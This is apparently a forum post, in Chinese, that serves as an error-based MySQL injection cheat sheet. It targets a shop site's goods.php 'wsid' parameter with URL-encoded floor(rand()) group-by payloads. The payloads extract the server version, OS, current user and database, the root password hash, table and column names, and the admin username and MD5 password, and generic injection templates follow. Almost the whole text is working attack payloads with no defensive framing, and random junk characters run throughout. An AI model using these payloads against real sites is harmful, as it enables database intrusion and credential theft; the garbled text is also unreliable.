判断版本号 # Q# S# h4 k% ]8 h* w; f
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# C* E Q- e E, ?8 u9 ]/ u$ K( a* b) W9 D& u# T, v! n: U
判断系统
3 j r0 L4 D9 A/ v. l7 b( g; F- B1 r k
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 k2 P+ |& g7 z. V2 |" A- Y; ~7 B% A) Q
' l% v( p# o# u5 ~9 Y
; }6 f, T b4 T# \
( t. n" a' ?% N0 p0 A4 \3 V) S) J当前 user()5 ~% G2 @( z% J2 M3 m& w4 \2 g1 f
2 B' }) d+ O# [% Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 u8 ]% [# k+ ?# B4 A0 }" U; @0 Y
+ O; E" B) u7 e! h+ T' T3 L8 F
& w. P% I6 j! h# v( Y: ~, R$ Y; O5 ~: H
当前 database()
" S$ [) x# c( rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! o# i) r% y' I: z, d* g
* R5 I2 \9 A' B" ]) p; R [1 m: F
( p2 ?, I. o; Q8 H3 V1 X1 s6 J- w! S o
9 E( {5 ^: K" O2 k0 troot hash0 y- ^ @4 J3 \+ c
) i) |) _9 i6 D' y; I( D
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ V' H6 F" H4 J
( |1 f- |3 ^) z1 F4 q) \1 i! l
, E+ R! ?7 s X, @7 B8 M; M6 @+ _0 b. _/ y& }' M8 a6 w
当前 数据库表名
. X! x3 z |; Q" e" p
8 k* X, L, k! U+ L8 D- B( s* ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ p# m! e; d( O2 L3 y# ~
& T9 M7 O+ ^* i& k* M2 D# l6 W" p# a! _; Z; B! e% R7 m
! {( E# s) w/ w3 W6 R当前 数据库 user_name 字段3 ^% v3 r N/ P, h% a
& |7 P- e. q" g7 chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" ]9 i) M( O. U2 G- \+ q# ~
! Y7 `5 Z" K5 d' _* Z8 }8 g, F当前 数据库 字段 password
+ ?0 M/ q& K5 M8 c0 ?7 bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! K$ N% @- {8 G+ y" I) D9 ~# R
9 r% t! y y9 `" m4 p5 v+ }8 U+ c: v& u+ S: Y9 S2 E+ I- b8 A
* f0 U( _) W/ M# |5 b) x: z
获得 admin passwd(md5)/ n$ S; X9 t5 B
, Y" h1 m9 B5 E
& W7 b" r+ C; ^+ l1 W: |8 Ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: t: O6 P* U" \# H7 N
0 x7 u2 B9 o! f, ~报错注射
0 k6 S: w4 G- P% ]SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)9 R4 u4 S3 o2 Z) S6 q
$ h6 [. i% q5 Q) L4 s" e
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) q$ Q$ g! Z) S* g
) z9 o' V7 {7 }' b. j+ f5 K% m
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |